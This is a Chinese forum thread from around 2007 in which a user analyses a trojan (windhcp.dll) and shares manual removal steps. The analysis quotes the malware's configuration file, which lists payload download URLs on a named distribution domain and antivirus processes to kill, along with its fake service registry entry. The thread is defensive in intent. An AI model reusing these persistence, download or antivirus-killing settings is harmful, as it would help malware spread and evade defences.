昨天我们公司有好几台电脑中毒了，我一看，啊~~~都是中这个病毒windhcp.dll 和windhcp.ocx


在网上一搜，发现很少杀毒软件把它能杀干净的，看了这个病毒的工作原理，下面我们就对正下药了！

==========================================================================
     此病毒的工作原理如下：
   
    setvp.exe运行以后释放windhcp.dll到系统目录，并将windhcp.dll注入Explorer.exe进程，创建服务：
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Win32DHCPsvc]
显示名：Win32 DHCP Service
描述：为远程计算机注册并更新 IP 地址。
可执行文件的路径：%System%\rundll32.exe windhcp.dll,start

   经过我仔细查看，发现这个病毒已经变种了， 它还会在winnt\system32\temp 中生成1.exe到10.exe的病毒
为什么我会在下面讲到的！   更可恶的是它还会生成一个 1.ini的文件，大家可要看清楚了，
1.ini文件内容如下:

[DOWNLOADNUMS]
updatetm=20
downfile=10
killproc=5
removreg=1
[STARTHTMPAGE]
;mainpage=http://www.sina.com.cn
[DOWNMAINLIST]
mainfile=http://www.god74.com/top/top.exe
[DOWNFILELIST]
downfile1=http://www.god74.com/mm/1.exe
downfile2=http://www.god74.com/mm/2.exe
downfile3=http://www.god74.com/mm/3.exe
downfile4=http://www.god74.com/mm/4.exe
downfile5=http://www.god74.com/mm/5.exe
downfile6=http://www.god74.com/mm/6.exe
downfile7=http://www.god74.com/mm/7.exe
downfile8=http://www.god74.com/mm/8.exe
downfile9=http://www.god74.com/mm/9.exe
downfile10=http://www.god74.com/mm/10.exe
[DOWNKILLLIST]
killproc1=avp.EXE
killproc2=rav.EXE
killproc3=kav.EXE
killproc4=kavsvc.EXE
killproc5=NAVAPSVC.EXE
[REMOVREGLIST]
;removreg1=HKEY_LOCAL_MACHINE\SOFTWARE\C07ft5Y\WinXP*test

看完这段代码，我想大家应该清楚了吧， 也就是说病毒是从www.god74.com中传过来的

访问这个网站，它首先会运行此网站top/top.exe
然后再看网站的访问量， 在1.exe和10.exe  中任意生成几个在  winnt\system32\temp

============================================================================

  好了，附件中是我自己写的批处理，只适用WIN2000 、XP，其它的我没有试验过

  有时候我很想问，中国的 网络检查的是干什么的？

  像这样恶意散布病毒的网站还留着他干什么？

  真的很希望相关部门对此网站进行查封


由于最开始我写的这个批处理中不小心把  WINNT\SYSTEM32下的rundll32.exe 也误删了

请大家原谅，不过我现在已经改正过来了！

如果还有什么地方编写有问题，请指教！~~~谢谢大家的支持
请大家把以下两个网址过滤掉，否则你永远杀不干净的
www.sina.com.cn www.god74.com

最近这病毒又有新的变种！由于工作繁忙，没有太多的精力去研究！希望有志之士帮我继续研究下去

此病毒可以远程控制电脑，它主要是通过局网感染的。最开始应该是浏览了一些带病毒的网站从而中招的

此病毒最新变种：请大家也把 www.17589.net 过滤掉

并且在SYSTEM32\TEMP下删除~10.exe ，如果删除不掉，那是因为你的注册表里没有删除
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Win32DHCPsvc
                                                     winDHCPsvc

         这两项
还有什么不懂的，附件内有病毒说明，可以参照的看一看了！
************************************************************
以下是更新内容:

今天我发现,此病毒和威金病毒好像慢慢的混和在一起了
昨天我重装的系统,今天就中了,我用什么专杀都没有反应,后来还是自己手动查杀的
中毒症状: 在WINNT\SYSTEM32下还是会有windhcp.dll和windhcp.cox这两个文件
          注册表的RUN下会添加很多WM_1.EXE启动项
变种分析:不同的是在WINNT\SYSTEM下生成logo_1.exe 1.exe 2.exe 3.exe 到10.exe  
         还多出一个go.exe和autorun.inf文件.  在其它的分区也会生成go.exe和autorun.inf文件.
暂时没有什么好的查杀方法,如果大家也中了类似的病毒.而且那些专杀也不起作用时,不防试试手动杀毒

呵.....怎么杀?看完这一段我想大家应该明白吧!!!

[ 本帖最后由 4328028 于 2007-1-6 16:48 编辑 ]

呵呵~我這兩天也遇到這個東西了

哦，忘了告诉大家了，运行批处理程序后，请重启后进入安全模式下再运行一遍这个批处理程序


  就OK了

谢谢楼主,我暂时还没遇到,我相信就我们公司那些人肯定会搞下来的.我先收下了,以备后患谢啦

谢谢楼主```先存下咯``

在正常模式下运行批处理后卫什么还要在安全模式下再运行亚？

防患于未然，先收藏！！！！
谢谢楼主

早上用DOS搞定掉了。

考，前几天公司里的人就中了。收下，谢谢楼主

防患于未然，先收藏！！！！
adY;b&Gf:vJubbs.54master.com谢谢楼主